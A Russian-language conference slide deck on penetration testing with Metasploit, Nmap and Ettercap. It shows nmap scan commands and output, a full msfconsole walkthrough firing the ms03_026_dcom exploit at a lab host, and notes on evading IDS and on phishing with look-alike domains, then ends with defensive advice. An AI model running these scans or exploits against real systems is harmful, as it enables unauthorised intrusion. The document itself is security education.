-
1.
WITH PASSION TO QUALITY
Святослав Логин
QA CONFERENCE #1 IN UKRAINE, KYIV 2018
Что такое Metasploit? Как его использовать
для проверки безопасности проекта?
-
2.
О себе:
- Святослав Логин
- QA Lead в Evo.company
- 5 лет в тестировании
- 6 проектов
-
3.
В evo.company входят такие проекты:
-
4.
Сегодня в программе:
- Metasploit
- Nmap
- Ettercap
-
5.
Вступление Знакомство с инструментами
-
6.
Вступление Вступление: Работа злоумышленников
Hardware
OS
Soft
WEB Сервер
-
7.
Вступление: Что такое Metasploit?
Metasploit - проект, посвященный
информационной безопасности.
-
8.
Вступление: База Exploit
38.000+ EXPLOITS
● OS
● DB
● Soft
● Hardware
-
9.
Вступление: Термины
-
10.
Вступление: Умение Metasploit?
● Проводить установку к shell или VNC cерверу
● Шифровать shellcode, скрывая атаки
-
11.
Вступление: Способы проникновения
Harry!!!
I come in
● Метод черного ящика
● Метод белого ящика
-
12.
Вступление: Ключевые шаги
● Определение цели
-
13.
Вступление: Ключевые шаги
● Выявление уязвимости
-
14.
Вступление: Ключевые шаги
● Эксплуатация уязвимости
-
15.
Вступление: Ключевые шаги
● Отчет
-
16.
Глава1 Сбор информации о цели
-
17.
Глава 1: Способы сбора информации
Нормальный мужик
долго на дороге не валяется
● Пассивный сбор информации
-
18.
Глава 1: Пассивный сбор информации
● Команда whois
-
19.
Глава 1: Пассивный сбор информации
● Команда dig
-
20.
Глава 1: Пассивный сбор информации
● Команда nslookup
-
21.
Глава 1: Способы сбора информации
● Активный сбор информации
-
22.
Глава 1: Активный сбор информации
Nmap - утилита предназначенная для разнообразного
сканирования IP-сетей с любым количеством объектов
-
23.
Глава 1: Активный сбор информации
1.Команда TCP connect [-sT]
1 nmap -sT -p1-20 test.net
2 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-16 14:55 EET
3 rDNS record for 193.239.68.38: www.test.net
4 PORT STATE SERVICE
5 1/tcp filtered tcpmux
6 2/tcp filtered compressnet
7 3/tcp filtered unknown
-
24.
Глава 1: Активный сбор информации
2.Команда UDP scan [-sU]
1 nmap -sU test.net
2 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-16 14:55 EET
3 rDNS record for 193.239.68.38: www.test.net
4 Not shown: 999 filtered ports
5 PORT STATE SERVICE
6 80/tcp open http
7 Nmap done: 1 IP address (1 host up) scanned in 5.01 seconds
-
25.
Глава 1: Активный сбор информации
3.Команда ACK scan [-sA]
1 nmap -sА test.net
2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-16 15:19 EET
3 Nmap scan report for 192.168.56.102
4 Host is up (0.0011s latency).
5 Not shown: 999 filtered ports
6 9001/tcp unfiltered tor-orport
-
26.
Глава 1: Активный сбор информации
4.Команда -O
1 nmap -O test.net
2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-16 15:19 EET
3 Nmap scan report for test.net
4 Host is up (0.0014s latency).
5 MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
6 Device type: general purpose
7 Running: Microsoft Windows 7
-
27.
Глава 1: Способы сбора информации
● Социальная инженерия
-
28.
Глава2 Эксплуатация уязвимости
-
29.
Глава 3: Эксплуатация
Список команд
- search exploit
- use exploit
- set
- show targets, options
-
30.
Глава 2: Запуск Metasploit
root@slogin: msfconsole
-
31.
Глава 2: Эксплуатация
1.Команда search exploit
1 msf > search ms03_026_dcom
2 Matching Modules
3 ================
4 Name Disclosure Date Rank Description
5 ---- --------------- ---- -----------
6 exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC
DCOM
-
32.
Глава 2: Эксплуатация
2.Команда use
1 msf > use exploit/windows/dcerpc/ms03_026_dcom
2 msf exploit(ms03_026_dcom) >
-
33.
Глава 2: Эксплуатация
3.Команда show options
1 msf exploit(ms03_026_dcom) > show options
2 Module options (exploit/windows/dcerpc/ms03_026_dcom):
3 Name Current Setting Required Description
4 ---- --------------- -------- -----------
5 RHOST yes The target address
6 RHOST 125 yes The target port
-
34.
Глава 2: Эксплуатация
4.Команда set
1 msf exploit(ms03_026_dcom) > set RHOST 102.168.56.102
2 RHOST =>102.168.56.102
3 msf exploit(ms03_026_dcom) >
-
35.
Глава 2: Эксплуатация
5.Команда show targets
1 msf exploit(ms03_026_dcom) > show targets
2 Exploit targets:
3 Id Name
4 -- ----
5 0 Windows NT SP3-6a/2000/XP/2003 Universal
-
36.
Глава 3: Примеры
1 msf exploit(ms03_026_dcom) > exploit
2 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
3 [*] Binding to 4d9f4ab8-7d1c-11cf-861e-
0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
4 [*] Bound to 4d9f4ab8-7d1c-11cf-861e-
0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
5 [*] Sending exploit ...
6 [*] Exploit completed.
-
37.
Глава3 Практика
-
38.
Глава 3: Цепочка развитий событий Base
DB DBn
OS R file
W file
User
Up user
Net
RAM
-
39.
Глава4
-
40.
Глава 4: Как узнать IP
Ettercap — это приложение для анализа
сетевого трафика, проходящего через интерфейс
компьютера, но с дополнительной
функциональностью.
http://viewdns.info
https://iphostinfo.com/
-
41.
Глава 4: Как узнать IP компа
-
42.
Глава 4: Как узнать IP компа
-
43.
Вывод: Как защититься
● Не позволяйте посторонним лицам иметь доступ в вашу сеть
● Помните об угрозе перехвата пароля
● Используйте VPN
● SSL-сертификаты
● Обновляйте все и вся
● Пользуйтесь лицензированным ПО
-
44.
Вывод: Точка G
Security
Functionality
Usability
-
45.
● База exploit - https://www.exploit-db.com/
● Nmap - https://nmap.org/man/ru/man-port-scanning-techniques.html
● ettercap - https://www.ettercap-project.org/index.html
Литература:
-
46.
Спасибо за внимание!
Вопросы?
svatogor
svyat.login@gmail.com
https://svyat.tech/
-
47.
QA CONFERENCE #1 IN UKRAINE, KYIV 2018
WITH PASSION TO QUALITY
svyat.login@gmail.com
https://svyat.tech/
Payload — Это код, который выполняется после успешного выполнения атаки
Exploit - это код с помощью которого пен-тестер может взломать систему, программу и т.п.
Конструировать эксплойты с необходимой в конкретном случае «полезной нагрузкой» (payloads), которая выполняется в случае удачной атаки, например, установка shell или VNC сервера.
Шифровать шеллкод, что может скрыть факт атаки от IDS или IPS.
Для проведения атаки необходима информация об установленных на удаленном сервере сервисах и их версии, то есть нужно дополнительное исследование с помощью таких инструментов, как nmap или nessus.
Метод черного ящика — осуществляется при отсутствии предварительной информации о цели. Для осуществления атаки, пен-тестеру приходится по крупицам собирать информацию о целевой системе
Метод белого ящика – осуществляется, когда пен-тестер имеет достаточно полную информацию о цели
сбор основной информации без физического соединения
реализация различных методов обнаружения, таких как сканирование, удаленный вход (remote login) и сетевые сервисы, чтобы выяснить, какие службы и программное обеспечение, работают на целевой системе.
подготовка отчета об уязвимости(ях) и меры противодействия
используется для получения информации о цели, не имея физического соединения или доступа к ней. Это значит, что мы используем другие источники информации такие как whois,nslookup и т.д. Допустим наша цель веб-приложение, тогда поиск по whois даст нам много полезного: ip-адрес, домены и под-домны, размещение серверов, хостинг и т.д.
логическое соединение (logical connection) с целью. Эта техника дает нам возможность перейти на след. уровень. Сканирование портов – широко используемый метод активного сканирования, в котором концентрируется внимание на сборе информации об открытых портах, доступных служб и т.п.
эта техника похожа на пассивный сбор информации, но опирается на человеческие ошибки, распечатки, телефонные звонки, банальную невнимательность и т.д. Например, хакер может зарегистрировать домен похожий на целевой и рассылать от его имени сообщение, что мол перейдите по ссылке, введите логин и пароль. Такие домены называются “злые близнецы”